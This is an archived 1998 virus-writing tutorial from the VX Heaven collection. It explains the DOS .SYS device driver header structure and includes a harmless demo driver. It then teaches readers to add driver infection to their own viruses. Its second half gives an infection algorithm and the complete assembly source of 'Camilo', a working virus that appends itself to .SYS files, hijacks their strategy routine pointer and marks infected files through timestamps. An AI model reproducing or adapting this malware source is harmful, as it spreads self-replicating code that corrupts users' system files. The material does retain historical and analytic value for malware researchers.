Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Little SYS Infection Tutorial

Int13h
February 1998

[Back to index] [Comments]

Well, here we will speak a bit about the infection of devices drivers, they are really very easy to infect. When finishing this reading you will be able to add infection of device drivers to your virus, then it will be more c00l :) A .SYS phile, that is, a device driver, is a bridge of communication between the software and hardware devices. The SYS philes are read from the CONFIG.SYS, they are loaded in an own segment without PSP and are originated at offset 0. They can be block or character devices. The structure of a device driver follows:

	HEADER
	STRATEGY ROUTINE
	INTERRUPT ROUTINE

The first part of a .SYS program is the header, which structure is:

OffsetLengthDescription
0432 bit pointer to next device driver header
42Attribute
62Pointer to strategy routine (offset)
82Pointer to interrupt routine (offset)
A8Name of the device

The first field is a 32 bit pointer to the device header of the next device, this is because in a .SYS file can be concatenated various devices, and the last in the chain has this relative offset of his header filled with the value FFFF:FFFF. The attribute word is used to identify if the driver is a character device or a block one. The next field, has the offset in the file where the strategy routine is, a strategy routine must save the location of the request header that DOS gives to it in ES:BX. The next field must hold the offset of the interrupt routine handler, which is the really working horse of the device driver, it must interpret the request header and perform the commands that it read from there. The last one, is a 8 bytes field that have the name of a character device or the number of units of a block device. DOS loads device drivers dynamically at boot time, reading them from the CONFIG.SYS, then a virus can take control before some antiviruses. You could read more about SYS structure in the chapter 9 of the Programmer's Technical Reference for MSDOS and the IBM PC, a very nice shareware document in TXT format.

Just as an example, we will code a simple SYS file which displays a message. Here it is:

8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
;
; SIMPLE SYS FILE, by Int13h
;
; Compile:
;       tasm /zi /m3 stupid.asm
;       tlink /m /v stupid.obj
;       tdstrip -c stupid.exe
;       ren stupid.com stupid.sys
;       Install stupid.sys with a DEVICE command in your CONFIG.SYS
;
.model tiny
.code
org 0

Silly_SYS:                      ; SYS Header
Next_Device dd 0ffffffffh       ; Just one device
Attribute   dw 8000h            ; Type: character device
Strategy    dw offset Strategy_Routine
Interrupt   dw offset Interrupt_Routine
NameDevice  db 'SillySYS'
  

Strategy_Routine:               ; Save ES:BX, address of the request header
        mov word ptr cs:[Request_Header],bx
        mov word ptr cs:[Request_Header+2],es
        retf


Interrupt_Routine:              ; The hearth of the program
        push ds
        push cs
        pop ds                  ; DS=CS

        ; Here, we points ES:BX to the request header
        les bx,dword ptr ds:[Request_Header]
        mov al,byte ptr es:[bx+2] ; Take the command byte
        test al,al              ; Is 0? That means, initialization
        jnz Go_Out              ; Nope

        ; Here we set the segment and ending offset of the program
        ; and with a 100h we indicate to DOS that all was sucessfull
        mov word ptr es:[bx+03h],0100h
        mov word ptr es:[bx+0eh],offset Ending
        mov word ptr es:[bx+010h],cs

        ; Display a stupid msg
        mov cx,15
        mov si,offset Message
        lodsb
        mov ah,0eh
        xor bx,bx
        int 10h
        loop $-7

        pop ds
Go_Out: sub ax,ax
        retf                    ; Return

        Request_Header dw 0,0   ; This will hold the address passed by DOS
        Message        db 'ABSURD WORLD!',13,10
        Ending:

End Silly_SYS

8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8

Well. As you can see it is simple enough. Now, we will speak about the infection matter. A virus can add itself to the end of file and point the Next_Device field (offset 0) of the header to itself, then it will be acting like a normal program, this is the way that Dark Angel of Phalcom/Skim has choosed, and you can read about it in the number 9 of 40Hex magazine. For our infection purposes, we will hook the strategy routine. This is the routine that grabs the pointer to the request header (ES:BX) then you must be careful not changing these registers, specially with the garbage if you are making a polymorphic virus.

Let's see:

	BEFORE INFECTION:
                   > Header (Points to Strategy Routine)
                   > Strategy Routine
                   > Interrupt Routine
	AFTER INFECTION:
                   > Header (Points to Virus)
                   > Strategy Routine
                   > Interrupt Routine
                   > Virus

In others words, we will follow the next algorithm:

  1. Open the SYS file.
  2. Read the header (10 bytes).
  3. Save in a buffer the original pointer to strategy routine.
  4. Move pointer to end of file (save AX value).
  5. Write virus there.
  6. Modify header, changing the pointer to the strategy routine to the value in AX (file size), then it will point to virus.
  7. Move the pointer to the beginning.
  8. Write the modified header.
  9. Close the sucker.

And that is all. For some comments I can be reached at [email protected] Here, as example, follows a runtime appending SYS infector which works by the method of reapoiting the strategy routine. Have fun!

8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
; Camilo Virus by Int13h
;
; To assemble:
;           tasm camilo.asm /m3
;           tlink camilo
;
; Run  the program camilo.exe in a directory where there are some .SYS files.
; Generally it will hang after the infection of all the  .SYS this is because
; when it returns control to the original strategy it points to offset 0, but
; the  infected  .SYS  will  run  without  any  problem.  Install  one of the
; infected  device  drivers  in  your CONFIG.SYS as  DEVICE=infected.sys  and
; all  will  be ok.  The virus is very simple and easy to understand, this is
; a  tutorial,  remember? :)          Compile  under  TASM,  I  hate  A86! :)

.model tiny
.code
jumps
org 0

VirusSize equ offset Heap-offset Camilo

Camilo: db 0b8h                 ; mov ax,original strategy routine offset
        Vieja_Estrategica dw 0  
        push ax                 ; Push the address, then we will jump with a RET

        push bx cx dx si di bp ds es

        push cs cs
        pop ds es               ; DS=CS

        call Delta
  Delta:pop di                  ; Get the delta offset
        sub di,offset Delta

        mov ah,02fh             ; Save original DTA
        int 021h
        mov word ptr [di+OriginalDTA],bx
        mov word ptr [di+OriginalDTA+2],es

        mov ah,01ah             ; Set an own DTA (points to heap)
        lea dx,[di+offset ViralDTA]
        int 021h

        mov ah,04eh             ; Look for all the .SYS files in the
        xor cx,cx               ; current directory
        lea dx,[di+offset Victims]
        int 021h
        jc PopThem
            
Verify: mov ax,03d02h           ; Open the file found
        lea dx,[di+offset ViralDTA+01eh]
        int 021h
        xchg bx,ax

        mov ah,03fh             ; Read 10 bytes
        lea dx,[di+offset Buffer]
        mov cx,10d
        int 021h

        mov si,dx
        mov ax,word ptr [si]
        cmp ax,'ZM'             ; SYS with .EXE header?
        je Close
        inc ax                  ; Check if it header has the value 0xffff
        jnz Close               ; to see if is the only device in the file

        mov ax,05700h           ; Get date and time
        int 021h
        mov word ptr [di+Fecha],dx
        mov word ptr [di+Hora],cx
        and cl,00011111b
        cmp cl,00011110b        ; 30*2= 60?  Look 4 infection mark
        je Close

        mov ax,04202h           ; Move pointer to EOF
        sub cx,cx               
        cwd
        int 021h

        mov cx,word ptr [si+6]  ; Store the original strategy routine
        mov word ptr [di+Vieja_Estrategica],cx
        ; Points strategy routine to virus code, at EOF (AX value)
        mov word ptr [di+offset buffer+6],ax

        mov ah,040h             ; Append virus to file
        mov cx,VirusSize
        lea dx,[di+offset Camilo]
        int 021h

        mov ax,04200h           ; Pointer to the beginning
        xor cx,cx
        cwd
        int 021h

        mov ah,040h             ; Write the modified header
        mov cx,10
        lea dx,[di+offset Buffer]
        int 021h

        mov ax,05701h           ; Restore date & time
        db 0bah
        Fecha dw 0
        db 0b9h
        Hora dw 0
        and cl,11100000b        ; Mark time as infected
        or cl,00011110b         ; Set seconds=30*2=60!
        int 021h

Close:  mov ah,03eh             ; Close the sucker
        int 021h

        mov ah,04fh             ; Call the next victim
        int 021h
        jnc Verify

PopThem:mov ah,01ah             ; Restore original DTA
        lds dword ptr dx,[di+offset OriginalDTA]
        int 021h

        pop es ds bp di si dx cx bx

        xor ax,ax
        ret                     ; Jump to the original strategy routine!

        Buffer    db 10 dup(0)  ; We will read the header here

        ; Dedicated to Camilo Jose Cela, a genial novelist from Spain
        VirusName db ' [CAMILO by Int13h] '

        Victims   db '*.sys',0  ; Files to infect

        HEAP label byte         ; End of virus in the file
        OriginalDTA dd 0        ; Old DTA address
        ViralDTA db 43 dup (0)  ; To use it in Find first/next functions

End Camilo
8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
		INT13H Paraguay, February 13, 1998
[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua